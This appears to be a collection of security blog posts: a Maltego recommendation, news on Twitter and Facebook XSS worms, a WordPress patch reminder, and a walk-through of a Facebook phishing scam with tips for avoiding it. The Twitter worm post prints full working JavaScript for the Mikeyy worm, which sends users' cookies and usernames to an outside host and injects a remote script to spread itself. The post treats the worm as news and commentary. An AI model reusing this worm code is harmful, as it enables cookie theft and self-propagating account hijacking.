Information Gathering at its Greatest!

There is a tool I've found recently that is purely genius and very innovative. It is called Maltego and is a information gathering tool that uses backends and social sites like facebook, twitter, blog post and more to gather information based on the information you give it and what searches you preform. The tool will bring back a graph based search results pulling up everything it could find on the subject whether it be name, domain, email, dns servers, linked sites and much, much more! This tool is a must have for enumeration and the great part is the community edition is free! Download the community edition here. If you need some help getting started you can view the video tutorials here.

- "Information is power. Information is Maltego."

Google Me

Google revealed that the company will serve Personal Profiles via the search results. Probably not a big deal, but this yet another example of how far Web2.0 technologies will go. It will be interesting to see how everything will span out. The good thing is that your profile is not available to the public by default. You need to opt in.

I will most definitely be watching...

Mikeyy Returns

According to Mashable, the Mikeyy twitter worm has returned.



I am personally not surprised. Given the ease of finding XSS vectors nowadays it is more surprising that we haven't seen massive XSS outbreaks everywhere.

XSS attacks and worms will become more and more relevant as the web expands because they are defacto the equivalent of buffer overflows in the software security world.

I think that talked about these stuff 4-5 years ago.

Twitter Worm

As I've already mentioned on the GNUCITIZEN blog, Twitter has been hit by the same worm twice. The worm is similar in nature to the infamous Samy XSS Worm which hit MySpace in 2005 but a lot less severe. This is yet another example that XSS worms could and will be used as a propagation mechanism for more sever types of malware.

For those who are curious, here is a the complete worm code:

function XHConn()
{
  var xmlhttp, bComplete = false;
  try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
  catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
  catch (e) { try { xmlhttp = new XMLHttpRequest(); }
  catch (e) { xmlhttp = false; }}}
  if (!xmlhttp) return null;
  this.connect = function(sURL, sMethod, sVars, fnDone)
  {
    if (!xmlhttp) return false;
    bComplete = false;
    sMethod = sMethod.toUpperCase();
    try {
      if (sMethod == "GET")
      {
        xmlhttp.open(sMethod, sURL+"?"+sVars, true);
        sVars = "";
      }
      else
      {
        xmlhttp.open(sMethod, sURL, true);
        xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
        xmlhttp.setRequestHeader("Content-Type",
          "application/x-www-form-urlencoded");
      }
      xmlhttp.onreadystatechange = function(){
        if (xmlhttp.readyState == 4 && !bComplete)
        {
          bComplete = true;
          fnDone(xmlhttp);
        }};
      xmlhttp.send(sVars);
    }
    catch(z) { return false; }
    return true;
  };
  return this;
}
 
function urlencode( str ) {
    var histogram = {}, tmp_arr = [];
    var ret = str.toString();
    
    var replacer = function(search, replace, str) {
        var tmp_arr = [];
        tmp_arr = str.split(search);
        return tmp_arr.join(replace);
    };
    
    histogram["'"] = '%27';
    histogram['('] = '%28';
    histogram[')'] = '%29';
    histogram['*'] = '%2A';
    histogram['~'] = '%7E';
    histogram['!'] = '%21';
    histogram['%20'] = '+';
    
    ret = encodeURIComponent(ret);
    
    for (search in histogram) {
        replace = histogram[search];
        ret = replacer(search, replace, ret)
    }
 
    return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
        return "%"+m2.toUpperCase();
    });
    
    return ret;
}
 
var content = document.documentElement.innerHTML;
userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
var username = userreg.exec(content);
username = username[1];
 
var cookie;
cookie = urlencode(document.cookie);
document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
document.write("<img src='http://stalkdaily.com/log.gif'>");
 
function wait()
{
  var content = document.documentElement.innerHTML;
 
  authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
  var authtoken = authreg.exec(content);
  authtoken = authtoken[1];
  //alert(authtoken);
  
  var randomUpdate=new Array();
  randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";
  randomUpdate[1]="Join www.StalkDaily.com everyone!";
  randomUpdate[2]="Woooo, www.StalkDaily.com :)";
  randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";
  randomUpdate[4]="Wow...www.StalkDaily.com";
  randomUpdate[5]="@twitter www.StalkDaily.com";
  
  var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
  
  updateEncode = urlencode(genRand);
  
  var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
  
  var ajaxConn = new XHConn();
  ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
  var ajaxConn1 = new XHConn();
  ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
}
setTimeout("wait()",3250);

New Facebook XSS Vulnerabilities

There was some buzz today about four new Facebook XSS vulnerabilities announced.  XSS (cross site scripting) is nothing new for Facebook but it's interesting since there is a pretty impressive worm called Koobface still making it's way around the Facebook user base (now spreading to Bebo).  Koobface spread easily through social engineering techniques and XSS has been used to assist with similar types of attacks in the past.  Interesting to see if there will be a combo Koobface/XSS type attack in the future.  

I won't go into a ton of detail about these new vulnerabilities but for a very good write up on these flaws and how they might relate to other attacks going on with social media check out Dancho Danchev's article over at zdnet.

Wordpress Upgrades to 2.6.5

A reminder to all you Wordpress users...make sure you update to version 2.6.5. From the Wordpress Blog:

"The security issue is an XSS exploit discovered by Jeremias Reith that fortunately only affects IP-based virtual servers running on Apache 2.x. If you are interested only in the security fix, copy wp-includes/feed.php and wp-includes/version.php from the 2.6.5 release package. 2.6.5 contains three other small fixes in addition to the XSS fix. The first prevents accidentally saving post meta information to a revision. The second prevents XML-RPC from fetching incorrect post types. The third adds some user ID sanitization during bulk delete requests.

...note that we are skipping version 2.6.4 and jumping from 2.6.3 to 2.6.5 to avoid confusion with a fake 2.6.4 release that made the rounds. There is not and never will be a version 2.6.4."

If you get something that tells you to install 2.6.4...don't do it! :-)

Analysis of a new Facebook phish

I recently noticed an interesting trend with Facebook. There seems to be an increase in spam and in particular a new type of phishing attempt has emerged that I have been seeing signs of on many different profiles. While phishing via Facebook is nothing new, this one is a bit different as the victim is not taken to a website that "looks" like a Facebook login page. This phish uses painfully annoying questions and pop-up's to get you to divulge your account information.

Do not go to any of the URL's mentioned in this article! You have been warned!

How does the phish work?
You will get an email or notice a wall post from one of your friends in Facebook. Note that your friend that has posted to your wall has had their account compromised or they have really fallen for the scam and have sent links out manually...more on that in a minute.

Initial contact via email notification or wall post (below).

Notice the really bad wording of the following:

"hey has anyone messaged you to let you know your face book pictre is all over ****.com?"

Notice the bad grammar and misspelling? This should be your first clue that this is a phish and you should not check out this domain no matter how curious you are! The bad news is most people will check it out....

Next, a pop-up will appear showing a link to hxxp://rotating -destination.com.

More "enticing" wording for you to click the OK button.

Clicking on this pop-up asks you to enter in the name of your friend, your name and your email.

Next, it takes you to this pop-up asking for your password for "registration".



After entering in your password it asks you how you found the site.

Interestingly, if you click on MySpace or Facebook it says it cannot retrieve your image.

After clicking on a link (they all seem lead to the same place) you will get to a page that tells you that they can't serve content to Facebook/MySpace.

Clicking the back button you will get another pop-up and after that you have to participate in an online "quiz". It's in a frame and really looks more like the ads you see online (click on the monkey, etc). This is the part that will generate ad revenue for phisher.

After the quiz you get to a screen which says that you have an image waiting for you and gives you a link to click.

Clicking on the link takes you to a site with a picture of a monkey and plays the sound of someone laughing...nice.



Finally, there is a link to a page of the bottom of this picture that takes you to a page telling you how to send this "harmless prank" to your friends....

Not sure if I have seen a phisher actually ask you for help! Makes things even easier for the phish creator. They even tell you to use "regular" email as you don't want Facebook to block you for being a "spammer"...

What's the end result?
The victim who goes to this website and enters in all the information requested will get their Facebook and/or MySpace profile hijacked (probably with an automated login script) and most likely their email compromised as well. Unfortunately, most people use the same password for both social media sites and email so this is a rather serious problem. If you or anyone you know fell victim to this phish, I advise changing your social media and email passwords immediately.

Special thanks to Greg and Tyler for helping out with the detailed analysis of this phish. Greg and Tyler do a ton of great malware analysis and they did some research to help determine if this phish was malware related. While there was no malicious downloads detected in this specific instance, Greg mentions the following additional information about this phish:

• The IP of the first domain is associated with 16 malware domains have been related to malware in the past (some serving Zlob trojans and one related to bogus blogs) so don't be surprised if this scam gets more agressive in the future.
  
• The IP is hosted with Oversee.net which is associated with about 90 instances of malware and rouge software.
• There is code in the HTML where a graphic would be served up with 1 pixel x 1 pixel (essentially hidden) but that code is commented out. So at some point that graphic might have had some exploit code or perhaps used to log your IP.
  

Some thoughts on how not to be a victim
Here are a few things to remember so you don't become a victim of these and other types of scams:

• Use a different, complex password for each of your accounts. That way if one password gets compromised all your other accounts don't get compromised as well.
  
• Even if your friends want you to click on links, be cautious! You never know if their profiles or email accounts have been hacked!
• Look for bad grammar and misspelled words as your first clue to a phish.
  
• Check out the Facebook Privacy & Security Guide which gives you some good tips to follow when using social media websites.